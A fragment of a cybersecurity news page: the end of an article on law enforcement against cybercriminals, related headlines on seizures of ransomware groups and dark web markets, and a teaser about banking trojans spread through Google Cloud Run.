However, with the combined efforts of law enforcement agencies worldwide, the message to cybercriminals is clear: there is no safe haven for those who seek to profit from extortion and cybercrime.

****RELATED ARTICLES****

1.  **Finnish Dark Web Marketplace PIILOPUOTI Seized**
2.  **NetWire Malware Site and Server Seized, Admin Arrested**
3.  **Hive Ransomware Disrupted; Servers and Dark Web Site Seized**
4.  **Ragnar Locker Ransomware Gang Dismantled, Suspect Arrested**
5.  **WT1SHOP Cybercrime Market Seized by US and Portuguese Police**

NCA’s LockBit Takedown: Source Code, Arrests and Recovery Tool Revealed

Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe.
The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly

Tag

#auth